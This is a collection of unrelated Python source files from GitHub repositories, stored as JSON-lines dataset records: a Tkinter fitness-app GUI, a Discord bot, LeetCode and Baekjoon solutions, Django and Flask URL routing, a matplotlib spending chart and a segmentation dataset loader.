#\r\n submitButton = Button(top, text=\"Submit\", font=\"Arial\", width=12, bg=\"#6aa84f\", command=toWelcomefromHome)\r\n submitButton.grid(columnspan=3, column=0, row=2, pady=(0,15))\r\n \r\n\r\n top.protocol(\"WM_DELETE_WINDOW\", closeLogin)\r\n\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=(0,0))\r\n\r\n\r\n # Login Button #\r\n loginButton = Button(root, text=\"Login\", font=\"Arial\", height=3, width=12, bg=\"#6aa84f\",command=showLogin)\r\n loginButton.grid(columnspan=2, column=0, row=1, pady=(0,30))\r\n\r\n\r\n # Register Button #\r\n registerButton = Button(root, text=\"Register\", font=\"Arial\", height=3, width=12, bg=\"#6aa84f\", command=openToSite)\r\n registerButton.grid(columnspan=2, column=1, row=1, pady=(0,30))\r\n\r\n\r\n # Instructions Label #\r\n instructions = Label(root, text=\"Please login. Don't have a account? Register!\", font=(\"Arial\",20), fg=\"#FFFFFF\", bg=\"#434343\")\r\n instructions.grid(columnspan=3, column=0, row=3)\r\n\r\n \r\n # Filler Space #\r\n filler = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler.grid(columnspan=3, column=0, row=4)\r\n\r\n\r\ndef showWelcome():\r\n def toHomefromWelcome():\r\n logoLabel.destroy()\r\n welcome.destroy()\r\n beginButton.destroy()\r\n logoutButton.destroy()\r\n filler.destroy()\r\n\r\n showHome()\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=(0,0))\r\n\r\n \r\n # Welcome Label #\r\n welcome = Label(root, text=\"Welcome back, [Insert Name]!\", font=(\"Arial\",20), fg=\"#FFFFFF\", bg=\"#434343\")\r\n welcome.grid(columnspan=3, column=0, row=1, pady=(0,30))\r\n\r\n\r\n # Begin Exercise Button #\r\n beginButton = Button(root, text=\"Begin Exercising\", font=\"Arial\", height=3, width=16, bg=\"#6aa84f\",command=startThread)\r\n beginButton.grid(column=1, row=2, pady=(15,30))\r\n\r\n\r\n # Logout Button #\r\n logoutButton = Button(root, text=\"Logout\", font=\"Arial\", height=2, width=8, bg=\"#6aa84f\", command=toHomefromWelcome)\r\n logoutButton.grid(column=1, row=3, pady=(0,30))\r\n\r\n \r\n # Filler Space #\r\n filler = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler.grid(columnspan=3, column=0, row=4)\r\n\r\n\r\ndef showResults():\r\n def toHomefromResults():\r\n logoLabel.destroy()\r\n output1.destroy()\r\n filler1.destroy()\r\n output2.destroy()\r\n squatsLabel.destroy()\r\n pushUpLabel.destroy()\r\n sitUpLabel.destroy()\r\n sqautsResult.destroy()\r\n pushUpResult.destroy()\r\n sqautsResult.destroy()\r\n filler2.destroy()\r\n beginButton.destroy()\r\n logoutButton.destroy()\r\n\r\n showHome()\r\n\r\n canvas = Canvas(root, width=700, height=400, bg=\"#434343\", highlightthickness=0)\r\n canvas.grid(columnspan=3)\r\n canvas.config(height=300)\r\n\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=0)\r\n\r\n\r\n # Output1 Label #\r\n output1 = Label(root, text=\"Great Job, [Insert Name]!\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n output1.grid(columnspan=3, column=0, row=1, padx=0)\r\n\r\n # Filler Space #\r\n filler1 = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler1.grid(columnspan=3, column=0, row=2)\r\n\r\n # Output2 Label #\r\n output2 = Label(root, text=\"You completed the following number of exercises:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\")\r\n output2.grid(columnspan=3, column=0, row=3, padx=0)\r\n\r\n\r\n # Results Label #\r\n squatsLabel = Label(root, text=\"Squats:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n squatsLabel.grid(columnspan=2, column=0, row=4, padx=(30,0))\r\n\r\n pushUpLabel = Label(root, text=\"Push-Up:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n pushUpLabel.grid(columnspan=2, column=0, row=5, padx=(0,0))\r\n\r\n sitUpLabel = Label(root, text=\"Sit-Up:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n sitUpLabel.grid(columnspan=2, column=0, row=6, padx=(40,0))\r\n\r\n\r\n sqautsResult = Label(root, text=\"500\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n sqautsResult.grid(columnspan=3, column=1, row=4)\r\n\r\n pushUpResult = Label(root, text=\"50\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n pushUpResult.grid(columnspan=3, column=1, row=5)\r\n\r\n sitUpResult = Label(root, text=\"5000\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n sitUpResult.grid(columnspan=3, column=1, row=6)\r\n\r\n\r\n # Filler Space #\r\n filler2 = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler2.grid(columnspan=3, column=0, row=7)\r\n\r\n\r\n # Begin Exercise Button #\r\n beginButton = Button(root, text=\"Begin Exercise\", font=\"Arial\", height=2, width=13, bg=\"#6aa84f\", command=startThread)\r\n beginButton.grid(columnspan=2, column=0, row=8, pady=(30,30))\r\n\r\n\r\n # Logout Button #\r\n logoutButton = Button(root, text=\"Logout\", font=\"Arial\", height=2, width=13, bg=\"#6aa84f\", command=toHomefromResults)\r\n logoutButton.grid(columnspan=2, column=1, row=8, pady=(30,30))\r\n\r\n\r\nroot = Tk()\r\n\r\nroot.title(\"VizFit Exercise Application\")\r\nroot.config(bg=\"#434343\")\r\nroot.resizable(False, False) \r\ncanvas = Canvas(root, width=700, height=400, bg=\"#434343\", highlightthickness=0)\r\ncanvas.grid(columnspan=3)\r\n\r\n\r\nshowHome()\r\n\r\n\r\nroot.mainloop()","repo_name":"NoahB7/CS4023-SeniorCapstone-VizFitComputerVisionFitness","sub_path":"Exercise GUI.py","file_name":"Exercise GUI.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39816295266","text":"nums = []\r\nfor _ in range(int(input())):\r\n num = int(input())\r\n if num >= 0:\r\n nums.append(num)\r\nnums.sort()\r\n\r\nans = 0\r\nfor num in nums:\r\n if num != ans:\r\n break\r\n ans += 1\r\nprint(ans)","repo_name":"juwkim/boj","sub_path":"백준/Silver/18295. Ants/Ants.py","file_name":"Ants.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7867703267","text":"#! python3\nfrom discord.ext import commands\nimport discord\n# import youtube_dl\nimport os\nfrom helpers import fun_helper as fun\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\ninitial_extensions = ['cogs.buzzle', 'cogs.fun', 'cogs.puzzlehunt', 'cogs.music']\nintents = discord.Intents.all()\nintents.members = True\nbot = commands.Bot(command_prefix='!', intents=intents)\n\n# if __name__ == '__main__':\n# for extension in initial_extensions:\n# bot.load_extension(extension)\n# bot.help_command.cog = bot.cogs[\"Misc\"]\n\n@bot.event\nasync def setup_hook():\n for extension_cog in initial_extensions:\n await bot.load_extension(extension_cog)\n # await bot.load_extension('cogs.fun')\n # await bot.load_extension('cogs.buzzle')\n # await bot.load_extension('cogs.puzzlehunt')\n # await bot.load_extension('cogs.music')\n\n bot.help_command.cog = bot.cogs[\"Misc\"]\n\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n await bot.change_presence(activity=discord.Game(name=\"東方Project | /help\"))\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n if message.content.lower() == 'fruce?':\n await message.channel.send('fruce?')\n if message.content.lower() == 'hotel?':\n await message.channel.send('Trivago.')\n if message.content.lower() == 'sus?':\n await message.channel.send('amogus')\n if message.content.lower() == 'cbt':\n await message.channel.send(fun.cbt())\n if message.content.lower().startswith('hmm'):\n emoji = ''\n await message.add_reaction(emoji)\n if message.content.lower().endswith('solved') and message.content[0] != \"!\":\n emoji = ''\n await message.channel.send(emoji)\n if message.content.lower().startswith('ayaya'):\n emoji = '<:ayayaya:831793340835037184>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('pog'):\n emoji = '<:mokoupoggers:831897999146745938>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('awoo'):\n emoji = '<:awoo:835499877185486848>'\n await message.channel.send(emoji)\n if message.content.lower() == 'le':\n emoji = '<:LeSanae:844559050272145440>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('pekoggers'):\n emoji = '<:pekoggers:844575409798250516>'\n await message.channel.send(emoji)\n\n if message.content.lower() in ['penis music', 'benis music', '🅱️enis music']:\n await message.channel.send('https://www.youtube.com/watch?v=c4KNd0Yv6d0')\n song_there = os.path.isfile(\"song.mp3\")\n try:\n if song_there:\n os.remove(\"song.mp3\")\n except PermissionError:\n await message.channel.send(\"Wait for the current playing music to end\")\n return\n voice = discord.utils.get(bot.voice_clients, guild=message.guild)\n voiceChannel = message.author.voice.channel\n if voice is None:\n await voiceChannel.connect()\n voice = discord.utils.get(bot.voice_clients, guild=message.guild)\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(['https://www.youtube.com/watch?v=c4KNd0Yv6d0'])\n for file in os.listdir(\"./\"):\n if file.endswith(\".mp3\"):\n os.rename(file, \"song.mp3\")\n voice.play(discord.FFmpegPCMAudio(\"./song.mp3\"))\n\n await bot.process_commands(message)\n\n\nbot.run(TOKEN)\n","repo_name":"Shazamed/Patchouli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27481391661","text":"# https://leetcode.cn/problems/he-wei-sde-lian-xu-zheng-shu-xu-lie-lcof/\r\n\r\ndef findContinuousSequence(target):\r\n ans = []\r\n i, j = 1, 2\r\n while i < j:\r\n sum = (i + j) * (j - i + 1) / 2\r\n if sum < target:\r\n j += 1\r\n elif sum > target:\r\n i += 1\r\n else:\r\n res = []\r\n for k in range(i, j+1):\r\n res.append(k)\r\n ans.append(res)\r\n i += 1\r\n return ans\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(findContinuousSequence(9))","repo_name":"An-Yuhang-ace/DataStructureAndAlgrithms","sub_path":"04_DoublePointers/findContinuousSequence.py","file_name":"findContinuousSequence.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"39196183017","text":"# @File: 3\n# @Author: Kevin Huo\n# @LastUpdate: 8/16/2020 1:07 PM\n\nfrom typing import List\n\n\nclass Solution:\n def maxDistance(self, position: List[int], m: int) -> int:\n \"\"\"\n https://leetcode-cn.com/problems/magnetic-force-between-two-balls/\n\n 二分法\n\n 步骤:\n 1 - 首先, 对 position 排序\n 2 - 第一项 和 最后一项 肯定要选, 这样就已经消耗了 2 颗球了. 所以我们在核心算法中:\n 2.1 如果 m<=2 那么直接返回 最后一项 - 第一项 的差,就是结果. 换句话说,把2个球放2边,它们之间的距离肯定最大呀.\n 2.2 如果 m>2 那么在核心算法中,我们只需要处理剩下的 m-2 颗球.\n 3 - 最大间隔 = (7 - 1) // (球数-1) = 6 // 2 = 3\n 为什么要先求出这个 最大间隔呢? 而且为什么是用上面这个公式求呢? 你这样想:\n 3.1 假设我们给定一个有序数组 arr = [1, 2, 3, 4, 5, 6, 7], 给定m=3, 首先,有两个球的位置已经固定了,分别是 arr[0] = 1 和 arr[5] = 6\n 3.2 然后,我们只需要考虑最后一个球放在哪里。\n 3.3 因为数组很短,所以我们可以在每个地方都放一次,试试哪种放置方法,可以让间隔最大。 注意,因为 开头和末尾的位置\n 已经被占用了,所以我们只能考虑 [2, 3, 4, 5, 6] 这个子数组:\n A - 放在 2 处, 那么整个数组就被分成了 1~2 和 2~7, 那么间隔分别是 1 和 5 >> 这种放置方法的最小的最大间隔是 1.\n B - 放在 3 处,数组被分成 1~3 和 3~7, 间隔分别是 2 和 4 >> 最小的最大间隔是 2\n C - 放在 4 处, 数组被分成 1~4 和 4~7, 间隔分别是 3 和 3 >> 最小的最大间隔是 3\n D - 放在 5 处, 数组被分成 1~5 和 5~7, 间隔分别是 4 和 2 >> 最小的最大间隔是 2\n E - 放在 6 处, 数组被分成 1~6 和 6~7, 间隔分别是 5 和 1 >> 最小的最大间隔是 2\n 综上,C 方案获胜。而且o我们可以发现当我们吧球放的离中心越近,最小的最大间隔就越大,这也说明一个问题:\n 这道题,我们要将球摆放的约平均,也就是说每个球之间的间隔约相近,最终的结果就越好。这个很容易理解,因为我们最后\n 求的,是一个\"最小的\"最大间隔,也就是说,不管你别的有多大,我只看你最小的那个。所以,我们要保证每一个间隔都不能\n 太小,所以,平均的放置就是最好的办法。\n 4 - 解释到这里,相信你应该明白我们为什么要先求出一个 “理论上最大的 最小间隔”,因为,我们摆球的时候,要用到2分法,而这个理论\n 的最大值,就是我们每次正在摆一颗球的时候,在二分搜索范围我们要遍历每一项,并且判断是否将当前的球摆在这,那么如何判断呢?\n 就要用到这个理论的最大值了。 换句话说,举个例子:\n 4.1 已知一个排序数组 arr = [1, 2, 3, 4, 7], 而且已知 m = 3\n 4.2 先把前两个球摆好,分别放在 arr[0](开头) 和 arr[-1] (末尾)的位置.\n 4.3 现在开始用二分法,摆最后一颗球。\n 4.4 摆之前,如我们所说,先求出 “理论上的最大值”,也就是 (7 - 1)//(3-1) = 6//2 = 3\n 4.5 也就是说,理论上,两颗球之前最大的 最小间隔,不可能超过 3.\n 4.6 那么,我们来进行二分法,并且利用这个 \"理论上最大的最小间隔,即3\" 来作为一颗球是否应该放在某个位置的判断依据。\n 以下是2分法的步骤:\n arr = [1, 2, 3, 4, 7]\n a - 初始化3个索引值:\n left = 1\n right = len(arr) - 2\n mid = (left + right) // 2\n (为什么左右是1和 len-1你?因为我之前说了,开头0 和 末尾 len-1 已经被2个球占了,所以2分法只在剩下的子数组中进行\n 而子数组的就是arr 去头去尾,所以初始化的Left不是0而是1,right不是len-1而是 len-2)\n b - 初始化完成后, 我们的中间索引是 2, 所以 arr[2] = 3\n c - 我们的第一次二分搜索范围,是从 arr[left] 到 arr[right], 即 [2, 3, 4] 这个数组.\n d - 我们将上面求出的 \"最大间隔\", 和左侧最近的球的索引相加,得到 3 + arr[0] = 3+1=4\n e - 我们用这个求出的值 4, 和 arr[mid] 比较, 结果是 4 > arr[mid](即arr[2]=3), 所以,我们只在二分范围的右半边搜索. (也就是只搜索右半边 [3, 4])\n f - 在这个范围内,从左到右遍历 [3, 4] 的每一项, 并且将当前项和 “理论上最大的最小间隔, 即 3+(距离最近的左边的一颗球的值)”进行比较:\n 注意,因为当前距离最近的左侧的球时 arr[0] = 1, 所以要比较的标准值=3+1 = 4, 也就是说,判断 [2, 3, 4]中的每一项是否 <4\n d-1 当前项arr[2] = 3, 它 < 4, 所以说明: 暂时不用把球放在这里,还可以继续往后移.\n d-3 当前项arr[3] = 4, 它 == 4, 所以说明: 这个球就是当前能选择的最优解了,必须把这颗球放在这里,为什么呢?因为\"理论上最大的间隔就是3\",如果你放在\n 当前的位置,就已经达到最大值了,你就算再往右移动,造成的结果也只是让后面的球之间的间隔变得更小,没有用。\n 所以,把当前球放在这里。\n (这次二分搜索到此结束)\n 4.7 我们在上面的步骤中,通过1次二分法,成功的放置了一颗球,但是我们可能有很多球,所以我们在做完一次二分搜索后,要\n 做一些后续步骤,来更新一些变量,并且做一些判断,来决定是否需要继续二分搜索,还是可以直接返回结果了呢?\n a - 我们每做一次2分法,必定要放一颗球,所以,每次二分法开始前,我们可以 m -= 1\n b - 在一次二分法结束后,我们判断 m是否为0:\n >> 若为0,则说明没有球可以放了,直接范湖结果即可,结束算法。\n >> 若不为0, 则说明还有球需要放,那我们更新以下参数,为下一次的二分法做准备:\n 1 - 我们要记录一个 \"距离当前搜索范围最近的一个 左侧的球的值\", 刚开始的时候,这个值初始化=arr[0]=1\n 第一次二分结束后,假设我们把球放在了 arr[3]=4的位置上,那我们把这个值更新成 4.\n (PS: 为什么需要这个值呢?因为我们在二分搜索中遍历每一项的时候,比较的基准值= 理论最大间隔+上面这个值\n 比如第一次二分法,我们遍历时,比较的基准值= 最大间隔+这个值 = 3+arr[0] = 3 + 1 = 4\n 因为我们只有3个球,所以只用一次二分法就够了,假如哦们还要做一次二分法的话,下一次遍历时,作为判断\n 依据的基准值,应该就变成了 理论最大间隔+更新后的上面提到的值 = 3+arr[3] = 3+4 = 7.\n 以此类推.\n )\n 2 - 二分搜索的 3 个索引都要更新:\n left = 上一次二分法中 放球的位置索引 + 1\n (举例,我们第一次,也是唯一的一次微分搜索中,放置球的索引是arr[3], 那么,这次二分结束后,我们将\n left 的值更新为 3+1 = 4, 也就是说,下次二分搜索将从 arr[4] 开始)\n\n right 不变\n\n mid = (left + right) // 2\n\n\n\n \"\"\"\n # 1 排序\n position = sorted(position)\n lenPos = len(position)\n\n # 2\n if m == 2:\n print(position[-1] - position[0])\n return position[-1] - position[0]\n\n # 3 核心代码, 处理剩下的 m-2 颗球\n # 求出理论上最大的 最小间隔\n max_min_distance = (position[-1] - position[0]) // (m - 1)\n\n # 求出理论上最小的最小间隔\n min_min_distance = min([position[i + 1] - position[i] for i in range(lenPos - 1)])\n if lenPos == m:\n return min_min_distance\n\n # 不用二分,就用最简单的从左到右的遍历实现\n balls = [position[0], position[-1]]\n latest_left_ball_value = position[0]\n count = m - 2\n start, end = 1, lenPos - 1\n while count > 0:\n count -= 1\n for i in range(start, end):\n curr = position[i]\n # 当且仅当 curr == max_min_distance + latest_left_ball_value 时候,直接将球放下\n if curr == max_min_distance + latest_left_ball_value:\n latest_left_ball_value = position[i]\n balls.append(latest_left_ball_value)\n start = i + 1\n break\n if curr < max_min_distance + latest_left_ball_value:\n # 贪心,不放球,还可以继续右移\n continue\n if curr > max_min_distance + latest_left_ball_value:\n # 已经超了,这里判断 i 是否是start:\n if i == start:\n # 放球\n latest_left_ball_value = position[i]\n balls.append(latest_left_ball_value)\n start += 1\n break\n # 如果不是,那么去前一个值, 因为前一个值肯定没超过理论的最大值\n latest_left_ball_value = position[i - 1]\n balls.append(latest_left_ball_value)\n start = i + 1\n break\n balls.sort()\n print(balls)\n lenBalls = len(balls)\n res = min([balls[i + 1] - balls[i] for i in range(lenBalls - 1)])\n print(\"res = %s\" % res)\n return res\n\n # todo 一下二分的思路,以后实现\n # # 开始第一次二分法, 初始化一些值\n # left = 1\n # right = lenPos - 2\n # latest_left_ball_value = position[0]\n #\n # # 一共需要执行 m-2 次二分搜索\n # count = m - 2\n # while left <= right:\n # count -= 1\n # mid = (left + right) // 2\n # check_standard = max_min_distance + latest_left_ball_value\n #\n # # 遍历搜索范围内的每一项,并且和 基准值比较\n # # 如果数组值 > 基准值: 结束遍历, 去当前项的前一项, 因为当前项已经超过理论最大值了.\n # # 如果数组值 < 基准值: 继续往右移动, 因为当前项还没有到达理论最大值,还可以再贪一步.\n # # 如果数组值 = 基准值: 结束遍历,将球放在当前位置,更新参数,准备进行下一次二分搜索.\n # # 先用 arr[mid] 和 check_standard 比较,来确认搜索左半边 (left - mid) 还是 右半边 (mid - right)\n\n\nif __name__ == '__main__':\n # 答案 = [3, 999999999, 2, 45, 5, 7]\n\n tests = [\n {\"position\": [1, 2, 3, 4, 7], \"m\": 3},\n {\"position\": [5, 4, 3, 2, 1, 1000000000], \"m\": 2},\n {\"position\": [1, 2, 3, 5, 7], \"m\": 3},\n {\"position\": [10, 12, 14, 17, 25, 27, 31, 33, 46, 55, 60, 70, 71, 88, 100], \"m\": 3},\n {\"position\": [79, 74, 57, 22], \"m\": 4},\n # 下面这个题打错了,我的答案是6,正确答案是7\n {\"position\": [82, 68, 79, 17, 70, 51, 5, 46, 27, 44, 39, 57, 94, 45, 88, 56], \"m\": 9}\n ]\n question_index = int(input(\"please type question index: \"))\n t = tests[question_index - 1]\n s = Solution()\n r = s.maxDistance(**t)\n","repo_name":"kehuo/algorithm_py3","sub_path":"lc/2020/August_16_case_202/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":12321,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14202505177","text":"from django.conf.urls import patterns, url, include\r\nfrom django.views.generic import ListView, DetailView\r\nfrom jordsengine.models import Post, Category, Tag\r\nfrom jordsengine.views import CategoryListView, TagListView, PostsFeed, CategoryPostsFeed, TagPostsFeed\r\nfrom django.contrib.sitemaps.views import sitemap \r\nfrom jordsengine.sitemap import PostSitemap, FlatpageSitemap\r\nfrom django.contrib.flatpages import views\r\n\r\n# Sitemaps\r\nsitemaps = {\r\n 'posts': PostSitemap,\r\n 'pages': FlatpageSitemap\r\n}\r\n\r\nurlpatterns = patterns('',\r\n\r\n\t# Index\r\n\turl(r'^(?P\\d+)?/?$', ListView.as_view(\r\n\t\tmodel=Post,\r\n\t\tpaginate_by=3,\r\n queryset=Post.objects.filter(published=True),\r\n\t\t), name ='index'),\r\n\r\n\t# Individual posts\r\n url(r'^(?P\\d{4})/(?P\\d{1,2})/(?P[a-zA-Z0-9-]+)/?$', DetailView.as_view(\r\n model=Post,\r\n queryset=Post.objects.filter(published=True),\r\n ), name='post'),\r\n\r\n # Categories\r\n url(r'^category/(?P[a-zA-Z0-9-]+)/?$', CategoryListView.as_view(\r\n paginate_by=20,\r\n model=Category,\r\n ), name= 'category'),\r\n\r\n # Tags\r\n url(r'^tag/(?P[a-zA-Z0-9-]+)/?$', TagListView.as_view(\r\n paginate_by=20,\r\n model=Tag,\r\n ), name='tag'),\r\n\r\n\r\n # Post RSS feed\r\n url(r'^feeds/posts/$', PostsFeed()),\r\n\r\n # Category RSS feed\r\n url(r'^feeds/posts/category/(?P[a-zA-Z0-9-]+)/?$', CategoryPostsFeed()),\r\n\t\r\n # Tag RSS feed\r\n url(r'^feeds/posts/tag/(?P[a-zA-Z0-9-]+)/?$', TagPostsFeed()),\r\n\r\n # Search posts\r\n url(r'^search', 'jordsengine.views.getSearchResults', name='search'),\r\n \r\n # Sitemap\r\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\r\n name='django.contrib.sitemaps.views.sitemap'),\r\n\r\n )\r\n\r\n","repo_name":"jordburns/boleynworkshop","sub_path":"jordsengine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9775728271","text":"from src import APP\nfrom src.event_apis import API_ROUTES as EVENT_API_ROUTES\n\n\nfunc_based_routes = ''\n\nclass_based_routes = EVENT_API_ROUTES\n\n\ndef configure_app_routes():\n for route in func_based_routes:\n api_url = route[0]\n handler = route[1]\n methods = route[2]\n APP.add_url_rule(api_url, \"{}|{}\".format(route, handler), handler, methods=methods)\n\n for route in class_based_routes:\n api_url = route[0]\n methods = route[1]\n view_function = route[2]\n APP.add_url_rule(api_url, methods=methods, view_func=view_function)\n","repo_name":"raghav1010/TrackXpress","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19598564478","text":"import csv\nimport matplotlib.pyplot as plt\nf = open('card.csv')\ndata = csv.reader(f)\nnext(data)\ndata = list(data)\n\ndeli = [0, 0, 0]\ntaxi = [0, 0, 0]\nfor row in data:\n if row[-1] == '전표매입' and row[5] == '(주)우아한형제들':\n mon, payment = int(row[0].split('-')[1]), int(row[-3])\n idx = mon - 10\n deli[idx] += payment\n if row[-1] == '전표매입' and '택시' in row[5]:\n mon, payment = int(row[0].split('-')[1]), int(row[-3])\n idx = mon - 10\n taxi[idx] += payment\n\n\nplt.rc('font', family = 'AppleGothic')\nplt.title('10월 ~ 12월 배달 지출 현황')\nplt.plot(['10월', '11월', '12월'], deli, color = 'red', label = '배달음식 지출액');\nplt.plot(['10월', '11월', '12월'], taxi, color = 'indigo', label = '택시비 지출액');\nplt.legend()\nplt.show()","repo_name":"bn-tw2020/PythonTutorial","sub_path":"day8/day8_3.py","file_name":"day8_3.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74628332085","text":"#Crie um programa onde 4 hogadores joguem um dado e tenham resultados\n#aleatórios. Guarde esses resultados em um dicionário. No final, \n#coloque esse dicionário em ordem, sabendo que o vencedor tirou o \n#maior número no dado.\n\nfrom random import randint\nfrom operator import itemgetter\n\ndicionario = {}\nranking = {}\n\nfor c in range(1, 5):\n dicionario[f'Jogador {c}'] = randint(1,6)\n\nranking = sorted(dicionario.items(), key=itemgetter(1), reverse = True)\n\nprint(ranking)","repo_name":"CezarMontenegro/python-exercises","sub_path":"desafio091.py","file_name":"desafio091.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"845813208","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView\n\nfrom apps.accounts.views import CustomAuthToken\nfrom config.api_docs import urlpatterns as api_docs_urlpatterns\n\nurlpatterns = api_docs_urlpatterns + [\n path('admin/', admin.site.urls),\n path('api/v1/', include(\"apps.core.urls\")),\n path('api/v1/', include(\"apps.cards.urls\")),\n path('api/v1/', include(\"apps.enemies.urls\")),\n path('accounts/', include(\"apps.accounts.urls\")),\n path('api/v1/', include(\"apps.user_database.urls\")),\n path('accounts/api-token-auth/', CustomAuthToken.as_view()),\n path('api/v1/', include(\"apps.news.urls\")),\n # YOUR PATTERNS\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n # Optional UI:\n path('api/schema/swagger-ui/',\n SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/schema/redoc/', SpectacularRedocView.as_view(url_name='schema'),\n name='redoc'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"apodisation13/cardgame","sub_path":"backend/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38889878035","text":"import segm.utils.torch as ptu\nfrom torchvision import transforms\n\nfrom segm.data import ImagenetDataset\nfrom segm.data import ADE20KSegmentation\nfrom segm.data import PascalContextDataset\nfrom segm.data import Pascal5iDataset\nfrom segm.data import CityscapesDataset\nfrom segm.data import Loader\n\n\ndef create_dataset(dataset_kwargs):\n dataset_kwargs = dataset_kwargs.copy()\n dataset_name = dataset_kwargs.pop(\"dataset\")\n batch_size = dataset_kwargs.pop(\"batch_size\")\n num_workers = dataset_kwargs.pop(\"num_workers\")\n split = dataset_kwargs.pop(\"split\")\n fold = dataset_kwargs.pop(\"fold\")\n shot = dataset_kwargs.pop(\"shot\")\n\n # load dataset_name\n if dataset_name == \"imagenet\":\n dataset_kwargs.pop(\"patch_size\")\n dataset = ImagenetDataset(split=split, **dataset_kwargs)\n elif dataset_name == \"ade20k\":\n dataset = ADE20KSegmentation(split=split, **dataset_kwargs)\n elif dataset_name == \"pascal_context\":\n dataset = PascalContextDataset(split=split, **dataset_kwargs)\n elif dataset_name == \"pascal5i\":\n datapath = r'/home/prlab/wxl/dataset/dir/pcontext/VOCdevkit'\n img_mean = [0.485, 0.456, 0.406]\n img_std = [0.229, 0.224, 0.225]\n im_size = dataset_kwargs.pop(\"image_size\")\n transform = transforms.Compose([transforms.Resize(size=(im_size, im_size)),\n transforms.ToTensor(),\n transforms.Normalize(img_mean, img_std)])\n use_original_imgsize = False\n dataset = Pascal5iDataset(datapath,fold,transform,split,shot,use_original_imgsize)\n elif dataset_name == \"cityscapes\":\n dataset = CityscapesDataset(split=split, **dataset_kwargs)\n else:\n raise ValueError(f\"Dataset {dataset_name} is unknown.\")\n\n dataset = Loader(\n dataset=dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n distributed=ptu.distributed,\n split=split,\n )\n return dataset\n","repo_name":"TrellixVulnTeam/fssegmenter_L783","sub_path":"segm/data/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23360091146","text":"import matplotlib.pyplot as 